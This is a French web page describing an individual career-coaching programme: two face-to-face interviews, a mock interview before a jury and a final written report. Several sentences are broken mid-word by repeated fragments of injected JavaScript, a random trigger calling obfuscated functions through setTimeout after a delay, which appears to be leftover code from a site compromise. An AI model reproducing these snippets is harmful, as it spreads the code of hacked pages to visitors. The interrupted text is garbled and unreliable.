Accompagnement individuel

Première étape sur une période de 2/3 semaines.

Entre les deux entretiens, l’étudiant revient avec d’autres réflexions et questions.
Entre les deux entretiens, l’étudiant revient avec d’autres réflexions et questions.

2 entretiens en face à face de 2h30 environ avec Sylvie Kaminka consultante ou Philippe Girard, enseignant : professionnels de l’entreprise, du recrutement et de l’enseignement.
N’hésitez pas à aller voir nos profils.

 

Pourquoi 2 entretiens ?

Pour laisser « décanter » et donner au candom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}idat le temps d’analyser et de réfléchir aux pistes proposées. Et pour le consultant d’affiner ses conseils adaptés.

 

Deuxième étape : simulation

Simulation d'entretien
Simulation d’entretien

Une simulation d’entretien /jury avec le consultant que le stagiaire n’aura pas rencontré pour éviter l’effet de feeling a priori et donc de halo positif ou négatif, débriefing et pistes d’amélioration.
A la fin de la séquence un document écrit et mailé reprendra les grandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}es lignes des conseils prodigués. Sorte de check list adaptée.
Un approfondissement ou suivi en face à face, par téléphone, ou par skype peut être envisagé.

 

 

Enfin : bilan oral et écrit

A la fin de la séquence un document écrit et mailé reprendra les grandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}es lignes des conseils prodigués. Sorte de check list adaptée.

Un approfondissement ou suivi en face à face, par téléphone, ou par skype peut être envisagé.